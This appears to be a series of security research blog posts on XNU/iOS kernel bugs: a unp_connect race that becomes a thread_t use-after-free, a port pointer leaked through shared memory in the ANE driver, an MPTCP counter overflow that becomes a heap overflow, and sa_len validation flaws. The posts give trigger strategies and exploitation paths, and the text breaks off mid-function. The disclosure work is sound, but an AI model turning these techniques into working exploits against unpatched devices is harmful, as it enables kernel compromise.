Don’t play with fire, or with race conditions

This is my first blog post of 2021. I wish all of you a wonderful new year.

Background

At Black Hat USA 2019, we presented a socket Use-After-Free (UAF) vulnerability on iOS caused by bad locking in the UNIX socket bind function. Briefly, the function unp_bind temporarily unlocks the socket while binding it to a vnode, which leads to a race condition. As a result, we can bind one socket to two vnodes. When the socket is closed and freed, one of the two vnodes still keeps a dangling pointer to the freed socket object. By manipulating that vnode again, we can trigger the socket UAF in the kernel. For more details, please refer to [1].

bind and connect are two basic socket interfaces, and they take the same parameters:

int connect(int socket, const struct sockaddr *address, socklen_t address_len);
int bind(int socket, const struct sockaddr *address, socklen_t address_len);

If the bind function is buggy, what about the connect function?

Socket Programming 101

A UNIX domain socket can be either connection-oriented (type SOCK_STREAM) or connectionless (type SOCK_DGRAM). In the connection-oriented case, we can set up a server socket, bind it to a local file address, and then listen for and accept new connections. Here, bind() assigns a unique name to an unnamed socket.

Using the local file name, we can connect a client socket to the server socket. If the connection succeeds, a new socket is inserted into the server socket’s connection queue. The server can then call accept() to extract the first connection request from the queue of pending connections, create a new socket with the same properties as the server socket, and allocate a new file descriptor for it.
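The server/client sequence above can be sketched with the standard POSIX socket calls. This is a minimal userspace sketch, assuming a POSIX system with UNIX domain sockets; the helper name unix_socket_demo and the socket path used below are hypothetical and not taken from this post. To keep it short, error paths do not close descriptors.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Hypothetical helper: bind a listening SOCK_STREAM socket to `path`,
 * connect a client to it, and accept the pending connection.
 * Returns 0 on success and -1 on any error. */
static int unix_socket_demo(const char *path, int *server, int *client,
                            int *accepted)
{
    struct sockaddr_un addr;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    if (strlen(path) >= sizeof(addr.sun_path))
        return -1;
    strcpy(addr.sun_path, path);
    unlink(path);  /* bind() fails with EADDRINUSE if the file already exists */

    /* Server: socket -> bind (gives the socket a name) -> listen. */
    *server = socket(AF_UNIX, SOCK_STREAM, 0);
    if (*server < 0 ||
        bind(*server, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        listen(*server, 8) < 0)
        return -1;

    /* Client: connect() by file name. The new connection is queued on the
     * listening socket; connect() does not wait for the server's accept(). */
    *client = socket(AF_UNIX, SOCK_STREAM, 0);
    if (*client < 0 ||
        connect(*client, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        return -1;

    /* accept() takes the first pending connection and returns a new fd. */
    *accepted = accept(*server, NULL, NULL);
    return *accepted < 0 ? -1 : 0;
}
```

Calling it with a writable path such as /tmp/unp_demo.sock yields three descriptors; bytes written to the client descriptor can then be read from the accepted one.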

The Vulnerability

A client socket is not supposed to be connected to different servers at the same time. With that in mind, let’s take a look at the function unp_connect. An abridged copy of its source code follows.

static int
unp_connect(struct socket *so, struct sockaddr *nam, __unused proc_t p)
{
	...
	socket_unlock(so, 0);  <<--- a. temporary unlock so

	NDINIT(&nd, LOOKUP, OP_LOOKUP, FOLLOW | LOCKLEAF, UIO_SYSSPACE,
	    CAST_USER_ADDR_T(buf), ctx);
	error = namei(&nd); 	<<--- b. lookup the address
	if (error) {
		socket_lock(so, 0);
		return error;
	}
	nameidone(&nd);
	vp = nd.ni_vp;				
	if (vp->v_type != VSOCK) {
		error = ENOTSOCK;
		socket_lock(so, 0);
		goto out;
	}
	...
	socket_lock(vp->v_socket, 1); /* Get a reference on the listening socket */
	so2 = vp->v_socket;
	...
	if (so < so2) {
		socket_unlock(so2, 0);
		socket_lock(so, 0);  <<--- c. relock the sockets
		socket_lock(so2, 0);
	} else if (so > so2) {
		socket_lock(so, 0);
	}
	/*
	 * Check if socket was connected while we were trying to
	 * get the socket locks in order.
	 * XXX - probably shouldn't return an error for SOCK_DGRAM
	 */
	if ((so->so_state & SS_ISCONNECTED) != 0) {
		error = EISCONN;
		goto decref_out;
	}

	...
		socket_unlock(so, 0); <<--- d. temporary unlock so 

		if ((so2->so_options & SO_ACCEPTCONN) == 0 ||
		    (so3 = sonewconn(so2, 0, nam)) == 0) {   <<---  e. make a new connection
			error = ECONNREFUSED;
			if (so != so2) {
				socket_unlock(so2, 1);
				socket_lock(so, 0);
			} else {
				socket_lock(so, 0);
				/* Release the reference held for
				 * listen socket.
				 */
				VERIFY(so2->so_usecount > 0);
				so2->so_usecount--;
			}
			goto out;
		}
		...
		if (so < so2) {
			socket_unlock(so2, 0);
			socket_lock(so, 0); <<--- f. relock
			socket_lock(so2, 0);
		} else {
			socket_lock(so, 0);
		}

		/* Check again if the socket state changed when its lock was released */
		if ((so->so_state & SS_ISCONNECTED) != 0) {
			error = EISCONN;
			socket_unlock(so2, 1);
			socket_lock(so3, 0);
			sofreelastref(so3, 1);  <<-- g. free the new conn
			goto out;
		}
...

	error = unp_connect2(so, so2);
	...
}

Sorry for the long code snippet. At first glance, you may notice that unp_connect locks and unlocks sockets multiple times, which is a strong indicator of a race condition. However, the comments in the function show that the developers were aware of the potential races: every time the socket is relocked, unp_connect checks whether the socket state has changed. For example, after the relock at (c), we find the following comment:

	 * Check if socket was connected while we were trying to
	 * get the socket locks in order.
	 * XXX - probably shouldn't return an error for SOCK_DGRAM

Another example: after the relock at (f), we find the comment:

/* Check again if the socket state changed when its lock was released */

Playing with race conditions is dangerous. In unp_connect, the vulnerability lies in the code path taken after a race has been detected. Since I don’t want to write a long post during the holidays, let’s go straight to the vulnerability.

		if ((so2->so_options & SO_ACCEPTCONN) == 0 ||
		    (so3 = sonewconn(so2, 0, nam)) == 0) {   <<---  e. make a new connection
		...
		/* Check again if the socket state changed when its lock was released */
		if ((so->so_state & SS_ISCONNECTED) != 0) {
			error = EISCONN;
			socket_unlock(so2, 1);
			socket_lock(so3, 0);
			sofreelastref(so3, 1);  <<-- g. free the new conn

In the code above, so3 is a new socket created from the server socket by sonewconn. unp_connect temporarily unlocks the client socket while calling sonewconn and relocks it afterwards. If the client socket’s state has changed to SS_ISCONNECTED in the meantime, meaning that the client socket was connected somewhere else while it was unlocked, unp_connect simply returns EISCONN and frees so3.

Let’s focus on the following two lines:

			socket_lock(so3, 0);
			sofreelastref(so3, 1);

so3 is locked by socket_lock and then passed to sofreelastref. Does sofreelastref actually free so3 right away? No!

void
sofreelastref(struct socket *so, int dealloc)
{
	struct socket *head = so->so_head;

	/* Assume socket is locked */

	if (!(so->so_flags & SOF_PCBCLEARING) || !(so->so_state & SS_NOFDREF)) {
		selthreadclear(&so->so_snd.sb_sel);
		selthreadclear(&so->so_rcv.sb_sel);
		so->so_rcv.sb_flags &= ~(SB_SEL | SB_UPCALL);
		so->so_snd.sb_flags &= ~(SB_SEL | SB_UPCALL);
		so->so_event = sonullevent;
		return;
	}
	...

Unless SOF_PCBCLEARING is set in so_flags and SS_NOFDREF is set in so_state, sofreelastref returns without deallocating the socket. Does a newly created socket like so3 have these flags set? Still no!

So now so3 is locked but not freed. Where is so3, then? In fact, it has been inserted into the server socket’s so_incomp list. Let’s go back to the function sonewconn.

/*
 * When an attempt at a new connection is noted on a socket
 * which accepts connections, sonewconn is called.  If the
 * connection is possible (subject to space constraints, etc.)
 * then we allocate a new structure, propoerly linked into the
 * data structure of the original socket, and return this.
 * Connstatus may be 0, or SO_ISCONFIRMING, or SO_ISCONNECTED.
 */
static struct socket *
sonewconn_internal(struct socket *head, int connstatus)
{
...
  so = soalloc(1, SOCK_DOM(head), head->so_type);
	if (so == NULL) {
		return (struct socket *)0;
	}
...
	/* Insert in head appropriate lists */
	so_acquire_accept_list(head, NULL);

	so->so_head = head;

...
	so->so_flags |= SOF_INCOMP_INPROGRESS;
...
		TAILQ_INSERT_TAIL(&head->so_incomp, so, so_list);
		so->so_state |= SS_INCOMP;
		head->so_incqlen++;
...
	so_release_accept_list(head);
...

It’s clear now: so3 sits on the server socket’s so_incomp list. When the server socket is closed, it is responsible for cleaning up the so_incomp list. The following code is from the function soclose_locked.

int
soclose_locked(struct socket *so)
{
...
		TAILQ_FOREACH_SAFE(sp, &so->so_incomp, so_list, sonext) {
			...
			if (persocklock != 0) {
				socket_lock(sp, 1);
			}
...

Have you spotted the issue? As we saw, so3 is locked and inserted into the so_incomp list. However, when soclose_locked processes the so_incomp list, it locks sp again, and sp is our already-locked so3!

So far this sounds like a mere locking bug. Indeed, the race condition in unp_connect has now turned into a double-lock issue: the same socket object is passed to socket_lock twice. Does that cause any memory safety problem?

The Lock

The implementation of locks on iOS is very complicated, at least to me, and readers can check the XNU source code for more details. In our case, socket_lock calls unp_lock, which eventually calls lck_mtx_lock, which in turn calls lck_mtx_lock_contended.

unp_lock(struct socket *so, int refcount, void * lr)
{
...
	if (so->so_pcb) {
		lck_mtx_lock(&((struct unpcb *)so->so_pcb)->unp_mtx);
...	

void
lck_mtx_lock(lck_mtx_t *lock)
{
	thread_t        thread;
...
	thread = current_thread();
...
	lck_mtx_lock_contended(lock, thread, FALSE);
}

If the lock is free, lck_mtx_lock_contended acquires it directly and sets its owner to the current thread pointer. Otherwise, if the lock is held, lck_mtx_lock_contended loops waiting until the lock is released, and during this process it uses the owner thread pointer for various purposes.
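To make the role of the owner field concrete, here is a toy C11 model of an owner-recording mutex. It is a hypothetical sketch, not XNU’s lck_mtx_t: the lock word stores an owner identity (in XNU, a thread_t pointer that the contended path may dereference), and a failed acquisition observes that owner, which is the value the real contended path goes on to use.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdint.h>

/* Toy owner-recording mutex (hypothetical, not XNU's lck_mtx_t).
 * 0 means unlocked; any other value identifies the owner. In XNU the
 * owner is a thread_t pointer. */
struct toy_mtx {
    _Atomic uintptr_t owner;
};

/* Try to acquire for `self`. On success the owner field records `self`.
 * On failure, *owner_seen receives the current owner: the value a
 * contended locker would go on to use. */
static int toy_mtx_try_lock(struct toy_mtx *m, uintptr_t self,
                            uintptr_t *owner_seen)
{
    uintptr_t expected = 0;
    if (atomic_compare_exchange_strong(&m->owner, &expected, self))
        return 1;
    *owner_seen = expected;  /* a failed CAS stores the observed value here */
    return 0;
}

/* Release the lock; nothing else ever clears the owner field. */
static void toy_mtx_unlock(struct toy_mtx *m)
{
    atomic_store(&m->owner, 0);
}
```

The key property for this bug is that the owner value stays in the lock word until someone unlocks it, regardless of what happens to the owner itself.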

How to trigger thread_t UAF

Now we try to turn the double-lock issue into a thread_t UAF. The idea is as follows.

We create two threads that try to connect the same client socket to two different server sockets. If unp_connect detects the race, it may create a new so3, insert it into the corresponding server socket’s so_incomp list, and then lock so3, leaving the thread_t pointer of the locking thread stored in so3’s lock.

Next, we terminate both threads, so the two thread_t objects are deallocated in the kernel. However, so3 still keeps a dangling thread_t pointer in its lock.

Now we close all the server sockets, which triggers the cleanup of their so_incomp lists. As a result, the kernel runs socket_lock(so3) again, and accessing the owner thread of so3’s lock triggers the thread_t UAF.
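The lifetime problem at the heart of this trigger can be illustrated in userspace with POSIX threads. In this hedged sketch (all names hypothetical), a thread takes a mutex and exits without releasing it, and the lock stays held after its owner is gone. Userspace pthreads cannot reproduce the kernel UAF itself, since they typically record the owner as a thread ID rather than a pointer to a kernel thread object; the sketch only shows that the lock outlives its owner.

```c
#include <assert.h>
#include <errno.h>
#include <pthread.h>

/* Stand-in for so3's lock (hypothetical). */
static pthread_mutex_t so3_lock = PTHREAD_MUTEX_INITIALIZER;

/* Stand-in for a connecting thread: it locks so3 on the EISCONN path and
 * then terminates without ever unlocking it. */
static void *connecting_thread(void *arg)
{
    (void)arg;
    pthread_mutex_lock(&so3_lock);
    return NULL;
}

/* Run the connecting thread to completion, then probe the lock as the later
 * close path would. Returns the pthread_mutex_trylock() result, or -1 if
 * the thread could not be created. */
static int probe_after_owner_exit(void)
{
    pthread_t t;
    if (pthread_create(&t, NULL, connecting_thread, NULL) != 0)
        return -1;
    pthread_join(t, NULL);                   /* the owner thread is gone */
    return pthread_mutex_trylock(&so3_lock); /* yet the lock is still held */
}
```

probe_after_owner_exit() is expected to return EBUSY: the mutex remains locked on behalf of a thread that no longer exists.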

For a complete PoC, please see [2].

Conclusion

We shared a thread_t UAF in the XNU kernel and analyzed how a detected race condition turns into a double-lock issue, and then into a UAF. We hope you enjoyed the post. Thank you for reading.

Don’t place a port in shared memory

Motivation

Today I read a very interesting blog post by Brandon Azad of Google Project Zero (https://googleprojectzero.blogspot.com/2020/11/oops-i-missed-it-again.html), which disclosed an incorrect bounds check in the function H11ANEInDirectPathClient::externalMethod that allows invoking the external methods of the (more privileged) H11ANEInUserClient in the context of the (less privileged) H11ANEInDirectPathClient, eventually leading to type confusion or other security issues.

It is most likely a copy-paste bug. Like Brandon, I missed this vulnerability too! That is somewhat embarrassing. Following up on Brandon’s post, we share another bug in the H11ANEIn driver.

H11ANEIn

The H11ANEIn driver was first introduced in iOS 12 for A12 devices (e.g., iPhone XS and XS Max).  I think that “ANE” stands for “Apple Neural Engine”.

The H11ANEIn driver offers two types of IOUserClient: H11ANEInDirectPathClient and H11ANEInUserClient. H11ANEInUserClient is the more powerful of the two, as it exposes more external methods than H11ANEInDirectPathClient. However, creating an H11ANEInUserClient requires a special entitlement, com.apple.ane.iokit-user-access, which only a few executables on iOS have, such as aned and mediaserverd.

H11ANEInDirectPathClient

Fortunately, the container sandbox allows opening the H11ANEInDirectPathClient IOUserClient, so third-party apps can open and communicate with it. Looking at H11ANEInDirectPathClient::externalMethod (OK, please forget about the incorrect bounds check here), we find that H11ANEInDirectPathClient actually exposes the following interfaces:

  • _ANE_DeviceOpen
  • _ANE_DeviceClose
  • _ANE_ProgramSendRequest

Now let’s take a look at the _ANE_ProgramSendRequest interface, which accepts a 16-byte structure input.

At the very beginning of _ANE_ProgramSendRequest, the structure input is treated as two uint64 values, which are passed to IOMemoryDescriptor::withAddressRange().

Clearly, the first value is a user-space address and the second is the length of the user-space buffer. After creating the IOMemoryDescriptor, _ANE_ProgramSendRequest calls its prepare and map functions to map the memory into kernel space. In other words, _ANE_ProgramSendRequest now sets up memory shared between the user-space app and the kernel.
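The 16-byte structure input described above can be modeled as a pair of 64-bit fields. This is a hypothetical userspace sketch: the struct and function names are ours, and only the layout (address first, then length) comes from the analysis above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical layout of the 16-byte structure input: a user-space
 * address followed by the buffer length, both 64-bit. */
struct ane_send_request_input {
    uint64_t user_addr;
    uint64_t length;
};

/* Decode the structure input, rejecting anything that is not exactly
 * 16 bytes. Returns 0 on success, -1 otherwise. */
static int parse_send_request(const void *input, size_t input_size,
                              struct ane_send_request_input *out)
{
    if (input == NULL || input_size != sizeof(*out))
        return -1;
    memcpy(out, input, sizeof(*out));
    return 0;
}
```

Both values are entirely caller-chosen, which is why the kernel ends up mapping whatever user buffer the app names.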

More importantly, the _ANE_ProgramSendRequest interface is meant to be called through IOConnectCallAsyncMethod, which allows an IOKit extension to process user-space requests asynchronously. By supplying a notification (wakeup) port, a user-space program receives a notification message when the request completes. This implies that the kernel or the extension must store the wakeup port somewhere so that it can send the notification later.

The vulnerability and exploit

The vulnerability is that _ANE_ProgramSendRequest records the notification context, including the port pointer, in the shared memory!

As we can see above, before invoking H11ANEIn::ANE_ProgramSendRequest, the wakeup port is stored in the shared memory at offset 2616 (note that the offset varies across iOS kernel versions).

Turning the vulnerability into an info leak is straightforward: after triggering H11ANEInDirectPathClient::_ANE_ProgramSendRequest, we can simply read a port pointer out of the shared memory.

Beyond the info leak, you may have already realized that there are many opportunities to exploit the vulnerability further, especially if you still remember the vulnerability exploited by the very first Pangu jailbreak tool (for iOS 7.4.1).

Just a quick recap: back then, IOSharedDataQueue stored a mach message header in shared memory, and we achieved kernel exploitation by crafting that header (https://googleprojectzero.blogspot.com/2018/10/deja-xnu.html).

Similarly, we can modify the port pointer in the shared memory so that the notification is sent to a fake (arbitrary) port. This post won’t go into the details of the exploit; there are many different ways to achieve kernel exploitation once you have full control over a port pointer.
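The core design flaw, a kernel pointer stored in memory that user space can also read and write, can be modeled with a plain buffer. In this hypothetical sketch, `shared` stands in for the mapped user buffer and WAKEUP_PORT_OFFSET uses the 2616 offset mentioned above (which varies by kernel version); the functions are illustrative stand-ins, not H11ANEIn code.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Offset from the post; it varies across iOS kernel versions. */
#define WAKEUP_PORT_OFFSET 2616

/* Hypothetical stand-ins: `shared` models a user buffer that is also mapped
 * into the kernel. The "kernel" stashes a port pointer there... */
static void kernel_store_port(uint8_t *shared, uintptr_t port)
{
    memcpy(shared + WAKEUP_PORT_OFFSET, &port, sizeof(port));
}

/* ...and later reads it back and trusts it, whatever user space wrote. */
static uintptr_t kernel_load_port(const uint8_t *shared)
{
    uintptr_t port;
    memcpy(&port, shared + WAKEUP_PORT_OFFSET, sizeof(port));
    return port;
}
```

Reading the slot from the user side gives the info leak; writing it before the "kernel" reads it back gives control over the pointer used for the notification.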

Things I haven’t mentioned

Reproducing the vulnerability is not that easy, because H11ANEIn::ANE_ProgramSendRequest will not deliver a notification to the user-space app unless the request is properly filled in.

First, H11ANEInDirectPathClient::ANE_DeviceOpen needs to be executed before H11ANEIn::ANE_ProgramSendRequest. Second, H11ANEIn::ANE_ProgramSendRequest will eventually go to the function H11ANEIn::ANE_ProgramSendRequest_gated.

Both H11ANEInDirectPathClient::ANE_DeviceOpen and H11ANEIn::ANE_ProgramSendRequest_gated perform a common operation: looking up a program buffer by a program handle ID, which comes from user input. Without a correct program handle ID, H11ANEIn::ANE_ProgramSendRequest simply returns, and no notification is sent.

So what are the program buffer and the program handle ID? Recall that there is another, more privileged IOUserClient, H11ANEInUserClient, which has interfaces to create and destroy ANE programs and to obtain program handle IDs:

  • H11ANEInUserClient::_ANE_ProgramCreate
  • H11ANEInUserClient::_ANE_ProgramCreateInstance
  • H11ANEInUserClient::_ANE_ProgramDestroy

However, container apps cannot create an H11ANEInUserClient. What can we do?

I had to spend some time on machine learning. It’s true. I learned how to use the Core ML framework (https://developer.apple.com/documentation/coreml) and how to integrate machine learning models into my app, and I tried all the models on the page https://developer.apple.com/machine-learning/models/.

Finally, I figured out that our app can talk to aned and ask it to create an H11ANEInUserClient and an ANE program. Once aned returns a program handle ID to our app, we can continue developing the exploit. So, if you want to reproduce the vulnerability, learn machine learning first!

Thank you for your time.

MPTCP Integer Overflow Vulnerability

In this blog, we will share an integer overflow vulnerability in the MPTCP module in the XNU kernel. 

When we started studying MPTCP, all we found in the official documentation was a very brief description:

“MPTCP is a set of extensions to the Transmission Control Protocol (TCP) specification. With MPTCP, a client can connect to the same destination host with multiple connections over different network adapters”.

A natural question then came to mind: at most how many connections can a client open to a host? To find out, we wrote a simple test program that creates an MPTCP socket and connects it to a host many times, to see when new connections can no longer be created.

The test program ran fine. The surprise was that it triggered a kernel panic when it exited.

The program was so simple that we had no clue what triggered the panic. After analyzing the panic log, we realized that closing the MPTCP socket had driven a recursive kernel function into kernel stack exhaustion. Note that this recursion panic has also been fixed; you won’t be able to trigger it on iOS 13.

We continued the investigation by turning to the XNU source code, where we quickly found the following data structure.

struct mptses {
	struct mppcb    *mpte_mppcb;            /* back ptr to multipath PCB */
	struct mptcb    *mpte_mptcb;            /* ptr to MPTCP PCB */
	TAILQ_HEAD(, mptopt) mpte_sopts;        /* list of socket options */
	TAILQ_HEAD(, mptsub) mpte_subflows;     /* list of subflows */
	uint16_t        mpte_numflows;          /* # of subflows in list */
	uint16_t        mpte_nummpcapflows;     /* # of MP_CAP subflows */
	sae_associd_t   mpte_associd;           /* MPTCP association ID */
	sae_connid_t    mpte_connid_last;       /* last used connection ID */
...

mptses represents an MPTCP session. Every time a new connection is created between a client and a host, a new subflow is added to mpte_subflows, and mptses->mpte_numflows records the number of subflows.

static void
mptcp_subflow_attach(struct mptses *mpte, struct mptsub *mpts, struct socket *so)
{
	struct socket *mp_so = mpte->mpte_mppcb->mpp_socket;
	struct tcpcb *tp = sototcpcb(so);

...
	/*
	 * Insert the subflow into the list, and associate the MPTCP PCB
	 * as well as the the subflow socket.  From this point on, removing
	 * the subflow needs to be done via mptcp_subflow_del().
	 */
	TAILQ_INSERT_TAIL(&mpte->mpte_subflows, mpts, mpts_entry);
	mpte->mpte_numflows++; //<====== no integer overflow checks

As we can see in mptcp_subflow_attach, creating a new connection increments mpte->mpte_numflows by one, but there is no integer overflow check at all.

You may also notice that mpte_numflows is of type uint16_t, so its maximum value is 0xFFFF! What if we create 0xFFFF+2 connections? mpte_numflows wraps around to 1!
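The wraparound is plain C unsigned arithmetic: a uint16_t counter is reduced modulo 65536 on each increment. The sketch below (function name hypothetical) mimics the unchecked mpte_numflows++ once per attached subflow.

```c
#include <assert.h>
#include <stdint.h>

/* Mimic the unchecked `mpte->mpte_numflows++` executed once per attached
 * subflow (hypothetical helper). */
static uint16_t numflows_after(unsigned long attached)
{
    uint16_t numflows = 0;
    for (unsigned long i = 0; i < attached; i++)
        numflows++;  /* conversion back to uint16_t wraps modulo 65536 */
    return numflows;
}
```

After 0xFFFF subflows the counter reads 0xFFFF, after 0x10000 it reads 0, and after 0xFFFF+2 it reads 1.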

By itself, the integer overflow doesn’t cause any memory error, so we went on to check how mpte_numflows is used. Simply grepping for mpte_numflows led us to the following sysctl handler, mptcp_pcblist:

static int
mptcp_pcblist SYSCTL_HANDLER_ARGS
{
...
	TAILQ_FOREACH(mpp, &mtcbinfo.mppi_pcbs, mpp_entry) {
		flows = NULL;
		socket_lock(mpp->mpp_socket, 1);
		VERIFY(mpp->mpp_flags & MPP_ATTACHED);
		mpte = mptompte(mpp);

...
		mptcpci.mptcpci_nflows = mpte->mpte_numflows;
...
		len = sizeof(*flows) * mpte->mpte_numflows;
		if (mpte->mpte_numflows != 0) {
			flows = _MALLOC(len, M_TEMP, M_WAITOK | M_ZERO);  //<=== alloc memory according to mpte->mpte_numflows
...
		f = 0;
		TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
			so = mpts->mpts_socket;
			fill_mptcp_subflow(so, &flows[f], mpts);  //<=== dump the list into the flows buffer. HEAP OVERFLOW!
			f++;
		

In mptcp_pcblist, mpte_numflows is used to compute the length of a temporary buffer. If mpte_numflows has already wrapped to 1, only ONE entry is allocated. However, mptcp_pcblist then traverses the whole mpte_subflows list and dumps every entry into that buffer. Heap overflow!
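The mismatch between the wrapped counter and the real list length can be reproduced with the BSD sys/queue.h TAILQ macros that XNU also uses. This is a hypothetical model: struct subflow stands in for struct mptsub, and overflow_entries() only counts how many entries the dump loop would write past a buffer sized from the 16-bit counter, rather than writing them.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/queue.h>

/* Hypothetical stand-in for struct mptsub. */
struct subflow {
    TAILQ_ENTRY(subflow) entry;
};
TAILQ_HEAD(subflow_list, subflow);

/* How many entries the TAILQ_FOREACH dump loop would write past a buffer
 * sized for `numflows` entries (0 if the buffer is large enough). Only
 * counts; nothing is written. */
static size_t overflow_entries(uint16_t numflows, struct subflow_list *head)
{
    size_t written = 0;
    struct subflow *s;
    TAILQ_FOREACH(s, head, entry)
        written++;
    return written > numflows ? written - numflows : 0;
}
```

With 0xFFFF+2 subflows on the list and the counter wrapped to 1, the loop would write 0xFFFF+1 entries beyond the one-entry allocation.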

We won’t get into exploitation here. With partially controlled values and a partially controlled length, exploitation would also be very interesting.

Fixing the issue is quite easy. The patch is as follows: mptcp_subflow_add now enforces a limit on mpte_numflows.

Do you still remember the question at the beginning? How many connections does an MPTCP socket allow? Now we have the answer:

#define MPTCP_MAX_NUM_SUBFLOWS 256
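A bounded attach in the spirit of that fix might look like the sketch below. The function name and the EOVERFLOW return value are assumptions for illustration; the post only states that mptcp_subflow_add now limits mpte_numflows.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>

#define MPTCP_MAX_NUM_SUBFLOWS 256

/* Hypothetical bounded attach: refuse a new subflow once the session
 * already holds the maximum, so the 16-bit counter can never wrap. */
static int subflow_add_checked(uint16_t *numflows)
{
    if (*numflows >= MPTCP_MAX_NUM_SUBFLOWS)
        return EOVERFLOW;
    (*numflows)++;
    return 0;
}
```

Because the cap (256) is far below 0xFFFF, checking before the increment is enough to keep the counter and the list length in agreement.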

Credit: The integer overflow was discovered and analyzed by Tao Huang and Tielei Wang of Pangu Lab.

Thanks for reading!

The pain of sockaddr->sa_len

0x00 Introduction

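sockaddr is a very ordinary data structure in the XNU kernel. It describes the basic attributes of a socket address, including the address length and the address family. It is defined as follows: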

struct sockaddr {
	__uint8_t       sa_len;         /* total length */   
	sa_family_t     sa_family;      /* [XSI] address family */
	char            sa_data[14];    /* [XSI] addr value (actually larger) */
};

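Because XNU supports many socket types, and different types may use sockaddr structures of different lengths, XNU defines a concrete sockaddr structure for each. For example, the following are the definitions of sockaddr_in, sockaddr_in6, sockaddr_un, and sockaddr_ctl.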

struct sockaddr_in {
	__uint8_t       sin_len;
	sa_family_t     sin_family;
	in_port_t       sin_port;
	struct  in_addr sin_addr;
	char            sin_zero[8];
};
struct sockaddr_in6 {
	__uint8_t       sin6_len;       /* length of this struct(sa_family_t) */
	sa_family_t     sin6_family;    /* AF_INET6 (sa_family_t) */
	in_port_t       sin6_port;      /* Transport layer port # (in_port_t) */
	__uint32_t      sin6_flowinfo;  /* IP6 flow information */
	struct in6_addr sin6_addr;      /* IP6 address */
	__uint32_t      sin6_scope_id;  /* scope zone index */
};
struct  sockaddr_un {
	unsigned char   sun_len;        /* sockaddr len including null */
	sa_family_t     sun_family;     /* [XSI] AF_UNIX */
	char            sun_path[104];  /* [XSI] path name (gag) */
};
struct sockaddr_ctl {
	u_char      sc_len;     /* depends on size of bundle ID string */
	u_char      sc_family;  /* AF_SYSTEM */
	u_int16_t   ss_sysaddr; /* AF_SYS_KERNCONTROL */
	u_int32_t   sc_id;      /* Controller unique identifier  */
	u_int32_t   sc_unit;    /* Developer private unit number */
	u_int32_t   sc_reserved[5];
};

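Every sockaddr_* structure starts with the sockaddr header: the first byte, sa_len, gives the length of the structure, and the second byte, sa_family, gives the address family. When the kernel works with a struct sockaddr* pointer, it has to cast it to a concrete type such as struct sockaddr_in6* or struct sockaddr_in* according to sa_family. It follows that when the kernel processes sockaddr data submitted from user space, lax checks on sa_family or sa_len can lead to security vulnerabilities. sa_len in particular describes the data length, so an improper check can cause out-of-bounds memory access and similar problems.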

0x01 Vulnerabilities

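In recent years, a number of sockaddr-related security vulnerabilities have been disclosed in XNU. The most famous is one that Ian Beer of Google Project Zero found in the mptcp module. We first describe that vulnerability in detail, since understanding its root cause is very helpful for finding new ones.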

Recap of a known vulnerability

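The mptcp vulnerability found by Ian Beer is in mptcp_usr_connectx. When handling sockaddr data passed in from user space, mptcp_usr_connectx assumes the family can only be AF_INET or AF_INET6, and it strictly checks sa_len for those two families. The logic flaw, however, is that once a sockaddr of any other family is passed in, its sa_len field is never checked, and mptcp_usr_connectx then calls memcpy with sa_len as the length, causing a heap overflow. For a more detailed analysis, see Issue 1558: XNU kernel heap overflow due to bad bounds checking in MPTCP.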

// verify sa_len for AF_INET:

  if (dst->sa_family == AF_INET &&
      dst->sa_len != sizeof(mpte->__mpte_dst_v4)) {
    mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__,
        dst->sa_len),
       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
    error = EINVAL;
    goto out;
  }

// verify sa_len for AF_INET6:

  if (dst->sa_family == AF_INET6 &&
      dst->sa_len != sizeof(mpte->__mpte_dst_v6)) {
    mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__,
        dst->sa_len),
       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
    error = EINVAL;
    goto out;
  }

// code doesn't bail if sa_family was neither AF_INET nor AF_INET6

  if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) {
    if (mptcp_entitlement_check(mp_so) < 0) {
      error = EPERM;
      goto out;
    }

    mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED;
  }

// memcpy with sa_len up to 255:

  if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
    memcpy(&mpte->mpte_dst, dst, dst->sa_len); <== when sa_family is neither AF_INET nor AF_INET6, sa_len is not validated, so it can be as large as 0xff, causing a heap overflow.
  }

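Ian Beer’s exploitation technique for this bug is also superb. Setting exploitation aside, let’s look again at the characteristics of this bug. In this code, the developers did deliberately check the sockaddr data, but only checked that the length matched for specific families; as a result, if the sockaddr passed in is of any other family, its sa_len field is never effectively checked.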
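The pattern is easy to reproduce in isolation. Because Linux’s struct sockaddr has no sa_len field, this hypothetical sketch mirrors the BSD layout in its own struct bsd_sockaddr, using Darwin’s family values (AF_INET6 is 30) and structure sizes. check_flawed() follows the shape of the mptcp_usr_connectx checks, and check_fixed() is an allow-list alternative of our own.

```c
#include <assert.h>
#include <stdint.h>

/* BSD-style sockaddr header, mirrored because Linux's struct sockaddr has
 * no sa_len field. Family values and sizes follow Darwin. */
struct bsd_sockaddr {
    uint8_t sa_len;
    uint8_t sa_family;
    char    sa_data[14];
};
#define BSD_AF_UNIX    1
#define BSD_AF_INET    2
#define BSD_AF_INET6   30
#define BSD_SIN_SIZE   16  /* sizeof(struct sockaddr_in) on Darwin */
#define BSD_SIN6_SIZE  28  /* sizeof(struct sockaddr_in6) on Darwin */

/* Shape of the mptcp_usr_connectx checks: lengths are validated only for
 * the expected families, so any other family passes with any sa_len. */
static int check_flawed(const struct bsd_sockaddr *dst)
{
    if (dst->sa_family == BSD_AF_INET && dst->sa_len != BSD_SIN_SIZE)
        return -1;
    if (dst->sa_family == BSD_AF_INET6 && dst->sa_len != BSD_SIN6_SIZE)
        return -1;
    return 0;  /* the caller would now memcpy() sa_len bytes */
}

/* Allow-list alternative: unknown families are rejected outright. */
static int check_fixed(const struct bsd_sockaddr *dst)
{
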